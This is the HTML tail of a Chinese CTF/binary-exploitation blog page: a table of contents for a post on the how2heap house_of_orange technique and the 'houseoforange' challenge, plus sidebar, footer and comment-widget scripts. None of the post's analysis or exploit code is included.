          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#how2heap-house-of-orange-amp-houseoforange"><span class="nav-number">1.</span> <span class="nav-text">how2heap - house_of_orange&amp;houseoforange</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#house-of-orange-c"><span class="nav-number">2.</span> <span class="nav-text">house_of_orange.c</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#houseoforange"><span class="nav-number">3.</span> <span class="nav-text">houseoforange</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#程序分析"><span class="nav-number">3.1.</span> <span class="nav-text">程序分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#build"><span class="nav-number">3.1.1.</span> <span class="nav-text">build</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#see"><span class="nav-number">3.1.2.</span> <span class="nav-text">see</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#upgrade"><span class="nav-number">3.1.3.</span> <span class="nav-text">upgrade</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞分析-amp-Exploit"><span class="nav-number">3.2.</span> <span class="nav-text">漏洞分析&amp;Exploit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#完整EXP"><span class="nav-number">3.3.</span> <span class="nav-text">完整EXP</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Coldshield"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">Coldshield</p>
  <div class="site-description" itemprop="description">分享一些bin学习日常</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">22</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Coldshield</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.7.2
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : true,
      notify     : false,
      appId      : 'APq34QYuAOTUtOPWMtySvyvt-gzGzoHsz',
      appKey     : 'xRjoMerK1OFN4Lad4pyXT0Bs',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
